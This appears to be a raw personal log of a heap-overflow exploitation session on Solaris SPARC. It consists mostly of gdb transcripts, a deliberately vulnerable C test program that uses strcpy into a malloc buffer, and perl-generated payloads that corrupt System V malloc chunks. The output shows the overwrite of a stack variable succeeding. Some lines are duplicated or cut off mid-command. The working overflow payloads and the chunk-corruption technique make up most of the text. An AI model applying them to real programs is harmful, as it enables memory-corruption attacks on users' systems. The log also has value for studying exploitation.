0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fcc <_malloc_unlocked+520>: ld [ %i4 ], %o0
0xff2c1fd0 <_malloc_unlocked+524>: ret
(gdb) x/x $o0
0xff342854: 0x00020d58
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
AA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 2, 0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
(gdb) bt
#0 0xff2c2a44 in t_splay () from /usr/lib/libc.so.1
#1 0xff2c28b0 in t_delete () from /usr/lib/libc.so.1
#2 0xff2c24b4 in realfree () from /usr/lib/libc.so.1
#3 0xff2c2018 in _malloc_unlocked () from /usr/lib/libc.so.1
#4 0xff2c1db0 in malloc () from /usr/lib/libc.so.1
#5 0x0001072c in func () at d.c:4
#6 0x000107a8 in main (argc=2, argv=0xffbeed14) at d.c:16
(gdb) b *0xff2c1ebc
Breakpoint 3 at 0xff2c1ebc
AA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`
Breakpoint 3, 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 3, 0xff2c1ebc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Breakpoint 2, 0xff2c1f98 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
(gdb) del 3
AA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xd0"'`" . "\xff\xff\xff\xff" . "AAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /tmp/a.out `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\x9c" . "AAAA" . "\xff\xff\xff\xff" . "AAAA(gdb) x/15i $pc
0xff2c1f98 <_malloc_unlocked+468>: ld [ %o1 ], %o0
0xff2c1f9c <_malloc_unlocked+472>: mov %o1, %i4
0xff2c1fa0 <_malloc_unlocked+476>: cmp %i3, %o0
0xff2c1fa4 <_malloc_unlocked+480>: bgu 0xff2c1fbc <_malloc_unlocked+504>
0xff2c1fa8 <_malloc_unlocked+484>: nop
0xff2c1fac <_malloc_unlocked+488>: and %o0, -4, %o0
0xff2c1fb0 <_malloc_unlocked+492>: st %o0, [ %o1 ]
0xff2c1fb4 <_malloc_unlocked+496>: b 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fb8 <_malloc_unlocked+500>: ld [ %i4 ], %o0
0xff2c1fbc <_malloc_unlocked+504>: call 0xff2c2670 <_morecore>
0xff2c1fc0 <_malloc_unlocked+508>: mov %i3, %o0
0xff2c1fc4 <_malloc_unlocked+512>: orcc %g0, %o0, %i4
0xff2c1fc8 <_malloc_unlocked+516>: bne,a 0xff2c1fdc <_malloc_unlocked+536>
0xff2c1fcc <_malloc_unlocked+520>: ld [ %i4 ], %o0
0xff2c1fd0 <_malloc_unlocked+524>: ret
(gdb) si
0xff2c1f9c in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$1 = 0xffffffd0
(gdb) p/x $i4
$2 = 0x0
(gdb) p/x $o1
$3 = 0x20d58
(gdb) p/x $i3
$4 = 0x130
(gdb) si
0xff2c1fa0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fa8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fac in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) si
0xff2c1fb0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$5 = 0xffffffd0
(gdb) si
0xff2c1fb4 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fb8 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb)
0xff2c1fdc in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) x/15i $pc
0xff2c1fdc <_malloc_unlocked+536>: add %i4, %o0, %o0
0xff2c1fe0 <_malloc_unlocked+540>: ld [ %o0 + 8 ], %o1
0xff2c1fe4 <_malloc_unlocked+544>: and %o1, -3, %o1
0xff2c1fe8 <_malloc_unlocked+548>: st %o1, [ %o0 + 8 ]
0xff2c1fec <_malloc_unlocked+552>: ld [ %i4 ], %o2
0xff2c1ff0 <_malloc_unlocked+556>: sub %o2, %i3, %o0
0xff2c1ff4 <_malloc_unlocked+560>: cmp %o0, 0x30
0xff2c1ff8 <_malloc_unlocked+564>: bcs 0xff2c2024 <_malloc_unlocked+608>
0xff2c1ffc <_malloc_unlocked+568>: sub %o0, 8, %o1
0xff2c2000 <_malloc_unlocked+572>: st %i3, [ %i4 ]
0xff2c2004 <_malloc_unlocked+576>: add %i4, %i3, %o0
0xff2c2008 <_malloc_unlocked+580>: or %o1, 1, %o1
0xff2c200c <_malloc_unlocked+584>: st %o1, [ %o0 + 8 ]
0xff2c2010 <_malloc_unlocked+588>: call 0xff2c240c <realfree>
0xff2c2014 <_malloc_unlocked+592>: add %o0, 0x10, %o0
(gdb) si
0xff2c1fe0 in _malloc_unlocked () from /usr/lib/libc.so.1
(gdb) p/x $o0
$6 = 0x20d28
(gdb) x/x 0x20d28
0x20d28: 0xfffffff8
(gdb)
Getting close to celebration point
bazz@blade72[pts/3][/tmp] cat e.c
func()
{
char *penis = malloc(10);
memset(penis,'B',300);
getchar();
}
main (int argc, char **argv)
{
int n = 5;
char *p = malloc(800);
strcpy(p,argv[1]);
printf ("n = 0x%x before awesomeness\n", n);
func();
printf ("n = 0x%x after awesomeness\n", n);
}
bazz@blade72[pts/3][/tmp] ./e AA
n = 0x5 before awesomeness
n = 0x5 after awesomeness
bazz@blade72[pts/3][/tmp] gdb e
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "sparc-sun-solaris2.7"...
/home/bazz/.gdb: No such file or directory.
(gdb) r `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\xa4" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'`
Starting program: /tmp/e `perl -e 'print "A"x0x2f0 . "\xff\xff\xff\xf8" . "AAAA" . "\xff\xbe\xec\xa4" . "AAAA" . "\xff\xff\xff\xff" . "AAAA" . "AAAA" . "AAAA" . "\xff\xbe\xef\x08" . "AAAA" . "AAAA" . "AAAA" . "\xff\xff\xff\xc8"'`
n = 0x5 before awesomeness
n = 0xffbeef08 after awesomeness
Program exited with code 0102.
(gdb)
At this point, I have the most important key to exploitation, an understanding of how the System V Bottom heap chunk can be exploited to do the coolio SWAP-O-ROONI trick.
Here’s what I can over-write
(gdb) x/i 0xff2c1da0
0xff2c1da0 <malloc+24>: call 0xff33d044 <_PROCEDURE_LINKAGE_TABLE_+60>
(gdb) info proc map
process 27631 flags:
PR_STOPPED Process (LWP) is stopped
PR_ISTOP Stopped on an event of interest
PR_RLC Run-on-last-close is in effect
PR_FAULTED : Incurred a traced hardware fault FLTBPT: Breakpoint trap
Mapped address spaces:
Start Addr End Addr Size Offset Flags
0x10000 0x13fff 0x4000 0 ----r-x
0x22000 0x23fff 0x2000 0x2000 ----rwx
0x24000 0x33fff 0x10000 0 --b-rwx
0xff280000 0xff32bfff 0xac000 0 ----r-x
0xff33c000 0xff343fff 0x8000 0xac000 ----rwx
0xff370000 0xff371fff 0x2000 0 ----rwx
0xff380000 0xff383fff 0x4000 0 ----r-x
0xff390000 0xff391fff 0x2000 0 ----rwx
0xff3b0000 0xff3dffff 0x30000 0 ----r-x
0xff3e0000 0xff3e1fff 0x2000 0x30000 ----rwx
0xff3e2000 0xff3e3fff 0x2000 0 ----rwx
0xffbee000 0xffbeffff 0x2000 0 -s--rwx
Maybe an easy way to get argv
(gdb) x/s *0x22760 0x1: <Address 0x1 out of bounds> (gdb) x/s *0x2275c 0xffbef02c: "���\200���\220" (gdb) x/s **0x2275c 0xffbef180: "/home/bazz/w_32" (gdb) x/s *(*0x2275c)+4) Junk after end of expression. (gdb) x/s *(*0x2275c)) Junk after end of expression. (gdb) x/s **0x2275c+4 0xffbef184: "e/bazz/w_32" (gdb) x/s *(*(0x2275c)) 0xffbef180: "/home/bazz/w_32" (gdb) x/s *(*(0x2275c)+4) 0xffbef190: "DDDDDAAHH" (gdb) x/x *___Argv 0xffbef180: 0x2f686f6d (gdb) x/x ___Argv 0xffbef02c: 0xffbef180 (gdb) x/x 0xffbef030 0xffbef030: 0xffbef190 (gdb) p/x $sp $1 = 0xffbee6e0
Finally, the secret sauce.
Breakpoint 1 at 0x10790: file e.c, line 10.
(gdb) r `perl -e 'print "A"x1000000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bazz/my_own_heap_exploit/e `perl -e 'print "A"x1000000'`
Breakpoint 1, main (argc=2, argv=0xffafadb4) at e.c:10
10 int n = 5;
(gdb) x/x ___Argv
0x0: Cannot access memory at address 0x0
(gdb) x/96x 0xffbeff00
0xffbeff00: 0x20313932 0x2e313638 0x2e313035 0x2e383220
0xffbeff10: 0x3232004d 0x4f44554c 0x4553484f 0x4d453d2f
0xffbeff20: 0x746f6f6c 0x732f6d6f 0x64756c65 0x732d322e
0xffbeff30: 0x32623100 0x53415043 0x5f535243 0x3d2f6772
0xffbeff40: 0x6f757073 0x2f756c61 0x622f6465 0x76686f73
0xffbeff50: 0x74004343 0x3d676363 0x0078756c 0x69627372
0xffbeff60: 0x633d2f73 0x6f757263 0x65732f78 0x696e752d
0xffbeff70: 0x70656e74 0x69756d2f 0x7372632f 0x6c69622f
0xffbeff80: 0x6c696278 0x63007063 0x65783d2f 0x67726f75
0xffbeff90: 0x70732f75 0x6c61622f 0x70636465 0x762f6578
0xffbeffa0: 0x616d706c 0x65730053 0x4150435f 0x474e5542
0xffbeffb0: 0x494e3d2f 0x67726f75 0x70732f75 0x6c61622f
0xffbeffc0: 0x62696e00 0x53554e57 0x2c53756e 0x2d426c61
0xffbeffd0: 0x64652d31 0x3030002f 0x686f6d65 0x2f62617a
0xffbeffe0: 0x7a2f6d79 0x5f6f776e 0x5f686561 0x705f6578
0xffbefff0: 0x706c6f69 0x742f6500 0x00000000 0x00000000
0xffbf0000: Cannot access memory at address 0xffbf0000
(gdb)
0xffbf0004: Cannot access memory at address 0xffbf0004
(gdb)
0xffbf0008: Cannot access memory at address 0xffbf0008
(gdb) x/96x 0xffbee000
0xffbee000: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee070: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee100: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee110: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee120: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee130: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee140: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee150: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee160: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee170: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee180: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee190: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee200: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee210: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee220: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee230: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee240: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee250: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee260: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee270: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee280: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee290: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee2f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee300: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee310: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee320: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee330: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee340: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee350: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee360: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee370: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee380: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee390: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee3f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee400: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee410: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee420: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee430: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee440: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee450: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee460: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee470: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee480: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee490: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee4f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee500: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee510: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee520: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee530: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee540: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee550: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee560: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee570: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee580: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee590: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee5f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee600: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee610: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee620: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee630: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee640: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee650: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee660: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee670: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee680: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee690: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee6f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee700: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee710: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee720: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee730: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee740: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee750: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee760: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee770: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee780: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee790: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee7f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee800: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee810: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee820: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee830: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee840: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee850: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee860: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee870: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee880: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee890: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee8f0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbee900: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee910: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee920: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee930: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee940: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee950: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee960: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee970: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee980: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee990: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9a0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9b0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9c0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9d0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9e0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbee9f0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea70: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeea80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeea90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeaa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeab0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeac0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeead0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeae0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeaf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeb90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeba0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeebf0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeec00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeec90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeca0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeece0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeecf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed70: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeed80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeed90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeda0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeede0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeedf0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeee90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeea0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeeb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeec0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeed0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeee0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeef0: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbeef00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef70: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef80: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeef90: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefa0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefb0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefc0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefd0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeefe0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbeeff0: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef000: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef010: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef020: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef030: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef040: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef050: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef060: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef070: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb)
0xffbef080: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef090: 0x41414141 0x41414141 0x41414141 0x41414141
0xffbef0a0: 0x41414141 0x41414141 0x41414141 0x41414141
